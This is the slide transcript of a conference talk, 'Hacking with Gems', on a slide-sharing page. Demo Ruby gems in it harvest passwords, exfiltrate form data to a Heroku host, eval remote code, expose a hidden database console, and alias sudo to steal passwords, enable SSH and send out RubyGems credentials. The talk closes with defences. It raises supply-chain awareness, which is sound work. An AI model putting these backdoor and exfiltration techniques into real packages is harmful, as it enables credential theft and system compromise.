Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems (denver.rb)

Benjamin Smith
August 13, 2014
Technology
0
160

Hacking with Gems (denver.rb)

Benjamin Smith

August 13, 2014
Tweet

More Decks by Benjamin Smith

See All by Benjamin Smith
Modules instead of Microservies
benjaminleesmith
0
88
Refactoring Rails Apps with Engines
benjaminleesmith
4
840
How I architected my big Rails app for success! (ConFoo 2014)
benjaminleesmith
1
230
Hacking with Gems (ConFoo 2014)
benjaminleesmith
1
110
How I architected my big Rails app for success! (RubyConfAU 2014)
benjaminleesmith
2
380
How I architected my big Rails app for success! (RMR 2013)
benjaminleesmith
4
400
Keeping Your Massive Rails App From Turning Into a S#!t Show (WindyCityRails 2013)
benjaminleesmith
1
220
Architecting your Rails app for success! (EuRuKo 2013)
benjaminleesmith
4
1.2k
Hacking with Gems (RuLu 2013)
benjaminleesmith
3
1.5k

Other Decks in Technology

See All in Technology
リンクアンドモチベーション ソフトウェアエンジニア向け紹介資料 / Introduction to Link and Motivation for Software Engineers
lmi
4
300k
2024年グライダー曲技世界選手権参加報告/2024 WGAC report
jscseminar
0
330
CysharpのOSS群から見るModern C#の現在地
neuecc
0
640
利きプロセススケジューラ
sat
PRO
5
2.7k
dev 補講: プロダクトセキュリティ / Product security overview
wa6sn
0
1.9k
ノーコードデータ分析ツールで体験する時系列データ分析超入門
negi111111
0
360
Terraform CI/CD パイプラインにおける AWS CodeCommit の代替手段
hiyanger
1
200
3次元点群データ「VIRTUAL SHIZUOKA』のオープンデータ化による恩恵と協働の未来/FOSS4G Japan 2024
kazz24s
0
140
Python(PYNQ)がテーマのAMD主催のFPGAコンテストに参加してきた
iotengineer22
0
320
Team Dynamicsを目指すウイングアーク1stのQAチーム
sadonosake
1
320
DMARC 対応の話 - MIXI CTO オフィスアワー #04
bbqallstars
1
150
これまでの計測・開発・デプロイ方法全部見せます! / Findy ISUCON 2024-11-14
tohutohu
3
350

Featured

See All Featured
Building a Scalable Design System with Sketch
lauravandoore
459
33k
Templates, Plugins, & Blocks: Oh My! Creating the theme that thinks of everything
marktimemedia
26
2.1k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
27
4.2k
Bash Introduction
62gerente
608
210k
Teambox: Starting and Learning
jrom
133
8.8k
Dealing with People You Can't Stand - Big Design 2015
cassininazir
364
24k
How to train your dragon (web standard)
notwaldorf
88
5.7k
No one is an island. Learnings from fostering a developers community.
thoeni
19
3k
Stop Working from a Prison Cell
hatefulcrawdad
267
20k
Optimizing for Happiness
mojombo
376
70k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
47
2.1k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
7
630

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith

  2. How to punk your friends with gems Benjamin Smith @benjamin_smith

  3. How-to get rich quick and (maybe) not go to jail!

    Benjamin Smith @benjamin_smith

  4. Four reasons you should NOT trust Benjamin Smith @benjamin_smith

  5. None

  6. who i am

  7. who i am

  8. who i am

  9. what i am NOT

  10. None

  11. please do not try this at home

  12. please do not try this at home

  13. None
  14. None

  15. Lawful Evil Lawful Good

  16. Lawful Evil Lawful Good

  17. Lawful Evil Lawful Good

  18. Lawful Evil Lawful Good

  19. once upon a time

  20. GEM remote: https://rubygems.org/ specs: actionmailer (4.1.4) actionpack (= 4.1.4) actionview

    (= 4.1.4) mail (~> 2.5.4) actionpack (4.1.4) actionview (= 4.1.4) activesupport (= 4.1.4) rack (~> 1.5.2)

  21. what’s the worst that could happen?

  22. None

  23. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  24. before... github.com/benjaminleesmith/awesome-rails-flash-messages

  25. after! github.com/benjaminleesmith/awesome-rails-flash-messages

  26. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  27. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

  28. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

  29. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages

  30. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages

  31. “development.log” ... "user"=>{"email"=>"[email protected]", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages

  32. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages

  33. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit

  34. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4:

  35. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4:

  36. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4:

  37. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit

  38. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country

  39. a one way ticket to

  40. that was easy. what else can I do?

  41. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector

  42. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector

  43. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  44. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  45. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector

  46. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

  47. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  48. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  49. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  50. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector

  51. /users/sign_in github.com/benjaminleesmith/net_http_detector

  52. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector

  53. hello db access! github.com/benjaminleesmith/net_http_detector

  54. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector

  55. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector

  56. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector

  57. careful of wolves in sheep’s clothing

  58. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5:

  59. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5:

  60. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5:

  61. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5:

  62. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5:

  63. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country

  64. i like the beach

  65. that was easy. what else can I do?

  66. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s

  67. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s
  68. None

  69. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s

  70. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s

  71. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s

  72. what what github.com/benjaminleesmith/better_date_to_s

  73. i can haz source github.com/benjaminleesmith/better_date_to_s

  74. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s

  75. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country

  76. that was easy hard. what else can I do? (that's

    easier)

  77. gem install bunlder

  78. gem install be_truthy github.com/benjaminleesmith/be_truthy

  79. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy

  80. what it ACTUALLY does github.com/benjaminleesmith/be_truthy

  81. github.com/benjaminleesmith/be_truthy

  82. file tree looks ok github.com/benjaminleesmith/be_truthy

  83. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

  84. but what was this? github.com/benjaminleesmith/be_truthy

  85. I see no C github.com/benjaminleesmith/be_truthy

  86. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy

  87. there is no Rakefile github.com/benjaminleesmith/be_truthy

  88. the real file tree github.com/benjaminleesmith/be_truthy

  89. the real file tree github.com/benjaminleesmith/be_truthy

  90. what does the Rakefile do? github.com/benjaminleesmith/be_truthy

  91. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

  92. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy

  93. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy

  94. what does "sudo" do now? github.com/benjaminleesmith/be_truthy

  95. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  96. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  97. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  98. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy

  99. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy

  100. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy

  101. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy

  102. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy

  103. take away: don't install ben's gems

  104. None

  105. how could I get you to install my gems?

  106. what gems are trustworthy?

  107. how can I add my code to already trusted gems?

  108. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy

  109. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  110. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  111. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem

  112. now I own your gems github.com/benjaminleesmith/be_truthy

  113. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy

  114. do people trust your gems?

  115. do people who install your gems have trustworthy gems?

  116. None

  117. there’s still one problem

  118. bootstrapping

  119. being popular sucks

  120. conferences

  121. social engineering

  122. None
  123. None
  124. None

  125. so what happens now?

  126. ruby gems goes down

  127. heroku deploys go down

  128. i go to the beach

  129. ruby gems goes down

  130. heroku deploys go down

  131. recovery

  132. so what now?

  133. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages

  134. Little Snitch obdev.at/products/littlesnitch/index.html

  135. gem install be_truthy github.com/benjaminleesmith/be_truthy

  136. fseventer fernlightning.com/doku.php?id=software:fseventer:start

  137. don’t “gem install” from strangers

  138. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy
  139. None
  140. None

  141. curl -sSL https://get.rvm.io | bash

  142. gem install rails -P HighSecurity

  143. > gem install rails -P HighSecurity Fetching: i18n-0.6.11.gem (100%) ERROR:

    While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy

  144. gem cert --build

  145. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html

  146. sandboxing

  147. github.com/rubygems/rubygems

  148. tools to detect malicious code

  149. private gem repos

  150. do not try this at home

  151. don't install gems you don't need to

  152. pay attention to what your gems do

  153. monitor your system

  154. read the source

  155. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary

  156. on install github.com/benjaminleesmith/coal-mine-canary

  157. the results github.com/benjaminleesmith/coal-mine-canary

  158. thank you!

  159. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  160. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith

  161. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith